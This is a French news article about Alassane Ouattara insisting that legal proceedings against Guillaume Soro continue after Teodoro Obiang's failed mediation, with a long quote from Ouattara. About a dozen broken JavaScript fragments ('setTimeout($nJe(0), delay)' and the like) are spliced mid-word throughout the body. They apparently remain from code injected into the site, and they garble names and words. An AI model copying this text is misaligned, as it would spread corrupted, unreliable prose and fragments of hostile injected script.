Allassane Ouattara annonce l’extradition de Guillaume Soro vers la Côte d’Ivoire

La guéguerre entre Guillaume Soro et Alassane Ouattara ne connaîtra pas son dénouement de sitôt. Venu à Abidjan ce samedi 28 décembre 2019 en vue d’apaiser la tension entre l’actuel chef de l’Etat ivoirien et son ex filleul, le président Equadom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to-guinéen Théodero Obiang N’guema n’aura pas obtenu les résultats escomptés.

Alassane Ouattara a en effet décidé de laisser libre cours à la procédure engagée contre le président du mouvement Générations et Peuples Solidaires (GPS), objet d’un mdom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andat d’arrêt international.

Le président Alassane Ouattara déclare a cet effet :

« J’aurais pu dire que le dossier est entre les mains de la justice et ne pas m’appesantir dessus, mais je peux vous dire que nul ne sera audom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}torisé à déstabiliser la Côte d’Ivoire, à perturber la quiétude des Ivoiriens. Le droit sera appliqué à dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tous, cdom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andidats ou pas.

Les cdom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andidatures ne sont pas encore ouvertes par la Commission élecdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}torale indépendante et même si c’était le cas, nul n’est au-dessus de la loi, aussi bien les anciens Présidents, les présidents d’Institutions, le Président de la République que dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tous les autres.

Nous sommes des cidom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toyens et nous sommes responsables devant les juridictions. J’ajoute que la Constitution de la Côte d’Ivoire a des éléments très clairs concernant les députés.

Les députés ne sont pas au-dessus de la loi. Ils ne peuvent pas être poursuivis dans le cadre de l’exercice de leur fonction. Mais qudom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and ils sont mêlés à la déstabilisation de ce pays, ils doivent faire face à la rigueur de la loi. La loi sera appliquée intégralement à dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tous les cidom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toyens, quel que soit le lieu où ils résident en dehors de la Côte d’Ivoire ».

Source: Senego

  •  
  •  
  •  
  •  
  •  
  • 254
    Partages
%d blogueurs aiment cette page :